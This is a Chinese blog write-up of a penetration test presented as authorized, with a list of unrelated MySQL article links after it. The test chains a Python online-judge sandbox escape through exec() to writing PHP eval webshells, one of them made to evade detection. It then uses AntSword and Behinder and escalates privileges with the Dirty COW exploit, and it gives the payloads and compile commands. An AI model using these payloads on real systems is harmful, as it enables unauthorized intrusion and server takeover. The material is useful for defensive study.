百度360必应搜狗淘宝本站头条
当前位置:网站首页 > 技术分类 > 正文

从外网绕过沙箱逃逸再到内网权限提升的一次常规渗透项目

ztj100 2024-10-27 18:30 27 浏览 0 评论

免责声明

由于传播、利用本头条俊杰说黑客所提供的信息而造成的任何直接或者间接的后果及损失,均由使用者本人负责,俊杰说黑客不为承担任何责任,一旦造成后果请自行承担!

前言:

最近也临近假期了也是一直在忙着干其它事情好久没写实战文章了,今天这个项目是之前一位企业运营加了花某授权的一次私人项目写的也是这次测试过程中相对简单的一环



已经过甲方授权发表文章。

代码执行和提权:

协议与规范中约定

不得使用任何扫描工具,一切测试内容都就当为手动测试为主

由于甲方规定不可使用扫描工具所以信息收集部分也得手动搜集

首先切入甲方给予的主域名之一 “test1.cn”

底下版权区存在友链点击发现其它资产


友情链接处第一项为【业务扩展】点击此超链接


发现甲方企业下属的子公司是个教育培训公司,由于在【授权书】中有说明企业下属子公司也算有效测试所以就讲这一大资产也列举为了测试资产之一。

培训公司主域名打开后发现业务主要为python培训,随后开始继续收集站点功能点寻找和梳理突破口。



发现一个提示面板但是没用直接舍弃了

梳理完资产后发现存在【python大闯关】功能点,实际浏览进一步突破:


看描述是练习print的点击发现存在在线编辑:


这是结果区:




测试发现可以编辑并运行代码所以第一时间就想到了沙箱逃逸


响应包中发现是nginx搭建的,根据经验nginx在linux上是要常见些的,当时也有很多win系统也用nginx搭建网站,但是花某这块先是用linux命令结合payload进行了测试:

首先直接输入:

import os 
os.system



提示非法import但是并没有给出是import语句非法还是import这个字符串非法所以进一步测试认证一下:



成功输出“import”所以是禁用了import语句而并非禁用了字符串,所以就有了操作空间这块直接构造payload试试:

command = 'import os\nos.system("id")'
exec(command)

这个payload是将 import os\nos.system("id") 作为一个字符串赋值给 command 变量,并使用 exec 函数执行了这个字符串中的代码。这样就能够实现和 os.system("id") 类似的效果,所以就绕过了import导入os的这一步操作从而绕过沙箱禁用import:



uid为501的普通用户,少见,但是还是回显了id命令的执行结果所以进一步利用,到了这一步通常就是写入py的shell了但是浏览功能点我发现了一个问题,py沙箱的的路径是

http://test1.user1.cn/pyuctu

然后再此路径下也是存在php文件的例如:

http://test1.user1.cn/search.php


就是个搜索栏所以写入php的shell应该也是能解析的,去构造payload试试:

command = 'import os\nos.system("echo "<?php @eval($_POST['cmd']); ?>" >> 1.php")'
exec(command)


蚁剑连接试试:

报错,看信息应该是文件不存在但是在沙箱中命令却是回显成功了,根据自身猜测去网站看看:

访问shell的位置:

http://test1.user1.cn/1.php

这块知道shell位置是因为此前还运行的ls确认的目录为根目录,沙箱也在根目录中所以shell位置就确定了,但是访问shell位置却回显不存在:


写入的shell不见了应该是被杀了,后续尝试了多个免杀的shell最终成功的是:

<?php
    $a=$_REQUEST['x'];
    $b="\n";
eval($b.=$a);
?>

根据shell就能知道应该是过滤了GET和POST了,shell管理工具连接。


用蚁剑再上个大马,因人而异花某只是感觉用蚁剑上传比较方便且传个冰蝎用冰蝎再进一步操作也很方便。



连接后查看基本信息看看:


CentOS 6.8系统2.6.32-642.15.1.el6.x86_64的内核,看到这个版本和内核直接脏牛提权试试:

https://github.com/FireFart/dirtycow/blob/master/dirty.c


下载exp,上传至目录



gcc -pthread /tmp/dirty.c -o /tmp/dirty -lcrypt

第一次编译失败后面发现是没下载gcc所以下载一下

yum install gcc


编译成功后下载运行exp

./dirty


再次查看id值:


成功。

总结:

这次的难度主要集中再沙箱逃逸中整体难度适中,后面的提权很奇怪对于

StackClash(CVE-2017-1000364)和SOCK_RAW(CVE-2016-8655)

都有打补丁但是对于较常见脏牛却没有。

#暑期创作大赛#

相关推荐

sharding-jdbc实现`分库分表`与`读写分离`

一、前言本文将基于以下环境整合...

三分钟了解mysql中主键、外键、非空、唯一、默认约束是什么

在数据库中,数据表是数据库中最重要、最基本的操作对象,是数据存储的基本单位。数据表被定义为列的集合,数据在表中是按照行和列的格式来存储的。每一行代表一条唯一的记录,每一列代表记录中的一个域。...

MySQL8行级锁_mysql如何加行级锁

MySQL8行级锁版本:8.0.34基本概念...

mysql使用小技巧_mysql使用入门

1、MySQL中有许多很实用的函数,好好利用它们可以省去很多时间:group_concat()将取到的值用逗号连接,可以这么用:selectgroup_concat(distinctid)fr...

MySQL/MariaDB中如何支持全部的Unicode?

永远不要在MySQL中使用utf8,并且始终使用utf8mb4。utf8mb4介绍MySQL/MariaDB中,utf8字符集并不是对Unicode的真正实现,即不是真正的UTF-8编码,因...

聊聊 MySQL Server 可执行注释,你懂了吗?

前言MySQLServer当前支持如下3种注释风格:...

MySQL系列-源码编译安装(v5.7.34)

一、系统环境要求...

MySQL的锁就锁住我啦!与腾讯大佬的技术交谈,是我小看它了

对酒当歌,人生几何!朝朝暮暮,唯有己脱。苦苦寻觅找工作之间,殊不知今日之事乃我心之痛,难道是我不配拥有工作嘛。自面试后他所谓的等待都过去一段时日,可惜在下京东上的小金库都要见低啦。每每想到不由心中一...

MySQL字符问题_mysql中字符串的位置

中文写入乱码问题:我输入的中文编码是urf8的,建的库是urf8的,但是插入mysql总是乱码,一堆"???????????????????????"我用的是ibatis,终于找到原因了,我是这么解决...

深圳尚学堂:mysql基本sql语句大全(三)

数据开发-经典1.按姓氏笔画排序:Select*FromTableNameOrderByCustomerNameCollateChinese_PRC_Stroke_ci_as//从少...

MySQL进行行级锁的?一会next-key锁,一会间隙锁,一会记录锁?

大家好,是不是很多人都对MySQL加行级锁的规则搞的迷迷糊糊,一会是next-key锁,一会是间隙锁,一会又是记录锁。坦白说,确实还挺复杂的,但是好在我找点了点规律,也知道如何如何用命令分析加...

一文讲清怎么利用Python Django实现Excel数据表的导入导出功能

摘要:Python作为一门简单易学且功能强大的编程语言,广受程序员、数据分析师和AI工程师的青睐。本文系统讲解了如何使用Python的Django框架结合openpyxl库实现Excel...

用DataX实现两个MySQL实例间的数据同步

DataXDataX使用Java实现。如果可以实现数据库实例之间准实时的...

MySQL数据库知识_mysql数据库基础知识

MySQL是一种关系型数据库管理系统;那废话不多说,直接上自己以前学习整理文档:查看数据库命令:(1).查看存储过程状态:showprocedurestatus;(2).显示系统变量:show...

如何为MySQL中的JSON字段设置索引

背景MySQL在2015年中发布的5.7.8版本中首次引入了JSON数据类型。自此,它成了一种逃离严格列定义的方式,可以存储各种形状和大小的JSON文档,例如审计日志、配置信息、第三方数据包、用户自定...

取消回复欢迎 发表评论: